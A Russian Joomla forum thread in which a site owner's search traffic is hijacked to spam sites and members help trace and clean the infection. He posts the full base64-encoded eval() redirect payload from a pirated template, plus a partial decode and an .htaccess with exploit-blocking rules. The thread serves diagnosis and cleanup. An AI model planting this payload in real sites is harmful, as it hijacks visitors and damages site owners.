Новости Joomla

Вышло обновление JL Like 5.2

Вышло обновление JL Like 5.2

JL Like — современный плагин для Joomla, который добавляет стильные кнопки "Поделиться" и счетчики лайков популярных соцсетей.

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 34 Ответов
  • 8726 Просмотров
*

allydawn

  • Захожу иногда
  • 132
  • 13 / 0
  • falling from the sky - day seven
Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« : 04.01.2012, 20:19:45 »
прошу помочь всех кто знает в чем может быть проблема - я с такой фигней впервые сталкиваюсь. Сразу к делу, суть проблемы опишу на практике.

В яндексе введите запрос "наружка самара" - первая ссылка на мой сайт, naruzhka-samara.ru. Самое интересное - если по этой ссылке кликнуть, то попадаешь совсем не на мой сайт, а очень даже на один из сайтов рекламирующих методику увеличения мужского достоинства, или хехехе-видео.

Как они это сделали? Почему ссылки в выдаче ведут на сайт спамеров? Причем ссылки с любой страницы моего сайта, причем и в гугле то же самое.
Очень нужна помощь, спасайте!
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #1 : 04.01.2012, 20:57:46 »
Троян обыкновенный.
Или курить форум или в коммерческий раздел
Записан
*

renault

  • Захожу иногда
  • 202
  • 1 / 0
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #2 : 04.01.2012, 21:44:22 »
кстати очень интересный вопрос - как они это делают? думаю навряд ли троян... я сталкиваюсь с такими штуками частенько.
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #3 : 04.01.2012, 21:48:33 »
Цитата: renault от 04.01.2012, 21:44:22
кстати очень интересный вопрос - как они это делают? думаю навряд ли троян... я сталкиваюсь с такими штуками частенько.
Ну так не надо на винду вирусы ловить
Записан
*

renault

  • Захожу иногда
  • 202
  • 1 / 0
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #4 : 04.01.2012, 21:51:12 »
Цитата: voland от 04.01.2012, 21:48:33
Ну так не надо на винду вирусы ловить
Слышал, что СЕО-шники сделали одному заказчику подобную вещь...
Записан
*

Виталик

  • Завсегдатай
  • 1244
  • 130 / 0
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #5 : 04.01.2012, 21:59:10 »
покажите .htaccess
Записан
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #6 : 04.01.2012, 22:01:24 »
хм, действительно прикольно. Троян не причем - voland, щелкните на сайт в яндексе - Вас тоже на задницу перекинет. При этом если перейти по ссылке в первом посту - попадаем на сайт ТС.
Даже если в опере проинспектировать ссылку в яндексе и щелкнуть по ней - попадаем на сайт ТС.
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #7 : 04.01.2012, 22:09:06 »
Цитата: beagler от 04.01.2012, 22:01:24
хм, действительно прикольно. Троян не причем - voland, щелкните на сайт в яндексе - Вас тоже на задницу перекинет. При этом если перейти по ссылке в первом посту - попадаем на сайт ТС.
Даже если в опере проинспектировать ссылку в яндексе и щелкнуть по ней - попадаем на сайт ТС.
А код условного редиректа не троян что ли подсунул?
Этим историям уже года 3, правда раньше на Яндекс\Рамблер внимания не обращали, только для Google редиректили.

Прям как впервые сталкиваетесь...
Записан
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #8 : 04.01.2012, 22:10:11 »
хм, то есть если клиент приходит с ПС - перекидываем на свой? А пауков пропускаем?
Действительно впервые.
Записан
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #9 : 04.01.2012, 22:10:26 »
Записан
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #10 : 04.01.2012, 22:16:24 »
спасибо за ссылку
Записан
*

allydawn

  • Захожу иногда
  • 132
  • 13 / 0
  • falling from the sky - day seven
Re: Мошенники используют редирект в поисков&#
« Ответ #11 : 04.01.2012, 23:27:31 »
Ок, разобрались что троян.... А что с ним делать-то дальше? Винда у меня чистая, по крайней мере текущий антивирь ничего не говорил.
Вирус в самой CMS? Как его лечить?

.htaccess вроде бы в порядке.

Код
##
# @version $Id: htaccess.txt 10492 2008-07-02 06:38:28Z ircmaxell $
# @package Joomla
# @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use


# ESLI NA SAITE BELIY EKRAN - RASKOMMENTIROVAT' STROKU NIZHE
#  php_value display_errors 1

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ /index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) /index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

Пойду рыть дальше по этому поводу. За ссылку спасибо, если еще будут варианты решения, буду крайне признателен.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #12 : 04.01.2012, 23:32:08 »
Если разгребу свои проблемы, так и быть гляну... Если никто раньше не возьмется.
Записан
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #13 : 05.01.2012, 00:11:02 »
это не в .htaccess а в php файлах. Начните с index.php в корне и шаблоне
Записан
*

allydawn

  • Захожу иногда
  • 132
  • 13 / 0
  • falling from the sky - day seven
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #14 : 05.01.2012, 00:38:20 »
Проблему решил самостоятельно, но на правильном пути был beagler.
Источник червей был в варезном шаблоне рокетов, который я по глупости поставил год назад. там в различных файлах были такие куски кода

Код
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVV
NFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG
9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iik
gb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/K
C4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLjM0NS5wbC8iKTsNCmV
4aXQoKTsNCn0NCn0NCn0NCn0="));

который при дешифровке превращался в примерно следующее

Код
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or...

Что, как я понимаю, свидетельствует о том что именно этот код является проблемой. снес шаблон, поставил лицовый, проверю со следующим апдейтом яндекса, насколько изменится ситуация.
Варезные шаблоны - зло, не раз в этом убеждался.  

Всем большое спасибо за помощь.
« Последнее редактирование: 05.01.2012, 03:03:09 от allydawn »
Записан
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #15 : 05.01.2012, 09:59:24 »
Цитата: allydawn от 05.01.2012, 00:38:20
... проверю со следующим апдейтом яндекса, насколько изменится ситуация.

Апдейта можно не ждать. Если все вычистили, редирект должен исчезнуть. Его в ссылках нет, он у Вас на сервере был.
Записан
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #16 : 05.01.2012, 11:04:37 »
странно - попробовал перейти с яндекса - опять на задницу перекидывает.
Может где-то ещё зараза осталась?
Апдейт действительно ждть не нужно.
Записан
*

beagler

  • Живу я здесь
  • 3276
  • 392 / 4
  • https://alorisman.ru/
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #17 : 05.01.2012, 11:05:20 »
я бы сделал локальную копию сайта и поиском в тотале нашел все файлы с гадостью
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #18 : 05.01.2012, 11:16:20 »
осталась примерно почти во всех файлах
Записан
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #19 : 05.01.2012, 11:22:33 »
Цитата: allydawn от 05.01.2012, 00:38:20
Проблему решил самостоятельно, но на правильном пути был beagler.
Источник червей был в варезном шаблоне рокетов, который я по глупости поставил год назад. т

Варезные шаблоны - зло, не раз в этом убеждался.

Тоесть
Производственная компания ООО «Наружка»
оказывает услуги за настоящие деньги а использует варез.

спрашивается
КАКОГО Х-ИГРЕК- Я ПОМОГАТЬ ТЕБЕ! ;D

ЖАБА ДАВИТ КУПИТЬ ШАБЛОН, ТАК ПОСТАВЬ БЕСПЛАТНЫЙ ;)
Записан
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #20 : 05.01.2012, 11:27:38 »
Примерно к пяти по Киеву можно стукнуть мне в асю, если есть желание.
« Последнее редактирование: 05.01.2012, 12:24:55 от wishlight »
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #21 : 05.01.2012, 12:42:35 »
Апдейт не жди чисти шаблон, а 500 ошибку на сайте поправь
стучи потом в суппорт ПС чтоб они обновили все и главное убрали копии
или просто пингом, но на это время уйдет
там у вас всего 16 страниц в Яндекс
Записан
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #22 : 05.01.2012, 13:04:02 »
1. Сменить шаблон на стандартный, проверить на редирект.
2. Если остался - перезалить дистрибутив Joomla полностью из установочного пакета с заменой файлов кроме папки installation и файла configuration.php
3. Если остался - скачать дамп базы и прошерстить на редирект
4. Если остался - что маловероятно - либо искать бэкап за то время, когда редиректа не было, либо пересобирать сайт.

Делать все это срочно, иначе позиции в поисковиках уедут вниз и надолго, если уже не уехали.
Записан
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #23 : 05.01.2012, 13:08:56 »
Цитировать
Мошенники используют редирект в поисковиках! Хелп! Аттеншн!

это тема ТС

Цитата: allydawn от 05.01.2012, 00:38:20
Проблему решил самостоятельно, но на правильном пути был beagler.
Источник червей был в варезном шаблоне рокетов, который я по глупости поставил год назад. т

Варезные шаблоны - зло, не раз в этом убеждался.

а это его цитата

ТЕПЕРЬ ВНИМАНИЕ

человек сознательно ставит варез и называет тех кто его распространяет МОШЕННИКАМИ
 :laugh: :laugh: :laugh:
а фирма рекламная и зарабатывает на этом деньги

а разработчики шаблона Х-игрек-Й сосут!
я очень извиняюсь за эти слова
но совесть надо иметь

ВЕДЬ НА ФОРУМЕ ВАРЕЗ НЕ ПРИВЕТСТВУЕТСЯ
Записан
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #24 : 05.01.2012, 13:11:03 »
Цитата: Град от 05.01.2012, 13:08:56
ТЕПЕРЬ ВНИМАНИЕ

человек сознательно ставит варез и называет тех кто его распространяет МОШЕННИКАМИ
 :laugh: :laugh: :laugh:

Что Вы к нему прицепились? Ошибся, ошибку осознал - надо обязательно тыкать? У Вас на компе все лицензия? И винда, и фотошоп, и все остальное?
Записан
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #25 : 05.01.2012, 13:27:04 »
Да варез к этому не имеет ни какого отношения
Все что они делают это вшивают свои ссылки без всяких редиректов и ждут ТИЦ
если сделать запрос в Google
Спойлер
[свернуть]
вы увидите что это пробл всего мира без исключений

поддерживаю Taatshi
Все такие "ЧЕСТНЫЕ", самим не смешно?
« Последнее редактирование: 05.01.2012, 14:45:20 от oriol »
Записан
*

allydawn

  • Захожу иногда
  • 132
  • 13 / 0
  • falling from the sky - day seven
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #26 : 05.01.2012, 13:38:00 »
to Град

Меня, признаться, почтило внимание к своей персоне, спасибо.
Еще раз повторю, что для использования варезного шаба были свои причины - сейчас я такими вещами не занимаюсь.

to Taatshi - Большое спасибо за понимание.

В итоге оказалось, что вирусный код залит не только в файлы шаблона, но и вообще практически во все php-файлы на сайте. И не только здесь, пострадал еще мой один мой сайт, интернет-магазин - с той же проблемой. Забекапил базу, перезаливаю сайты по-новой. Посмотрим что из этого выйдет.

--- ps.: на другом взломанном сайте стоял лицензионный шаблон от yootheme, поэтому здесь это никакой роли не играет, на мой взгляд ---
Записан
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #27 : 05.01.2012, 13:56:39 »
Вот ресурс который нужно изучать плотно http://bugtraq.ru
И возможно вы поменяете свой род занятий
перестанете строить и начнете ломать (за деньги)))))))))

Решил вернуться и дать еще одну полезную ссылку http://www.kraeg.ru/node/69
« Последнее редактирование: 05.01.2012, 14:07:08 от oriol »
Записан
*

allydawn

  • Захожу иногда
  • 132
  • 13 / 0
  • falling from the sky - day seven
Re: Мошенники используют редирект в поисков&#
« Ответ #28 : 05.01.2012, 15:05:52 »
oriol,
премного благодарен, как только разберусь с текущей ситуацией, ознакомлюсь.
на данный момент очистил от вируса интернет-магазин (пришлось делать чистую установку движка/импорт базы), осталось почистить тот сайт о котором шла речь вначале.
Записан
*

Виталик

  • Завсегдатай
  • 1244
  • 130 / 0
Re: Мошенники используют редирект в поисковиках! Хелп! Аттеншн!
« Ответ #29 : 05.01.2012, 17:08:52 »
странно что дата последнего изменения в файлах не изменилась
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 2497 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 3474 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Всплывающее спам-сообщение+редирект на Joomla 2.5.14

Автор bonusfree

 Ответов: 21
Просмотров: 2326 		Последний ответ 02.12.2020, 21:56:30
от bonusfree
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

 Ответов: 792
Просмотров: 292020 		Последний ответ 23.02.2020, 21:18:16
от draff
Редирект с мобильных устройств, вирус на сайте

Автор liv

 Ответов: 6
Просмотров: 1329 		Последний ответ 20.09.2017, 12:49:10
от wishlight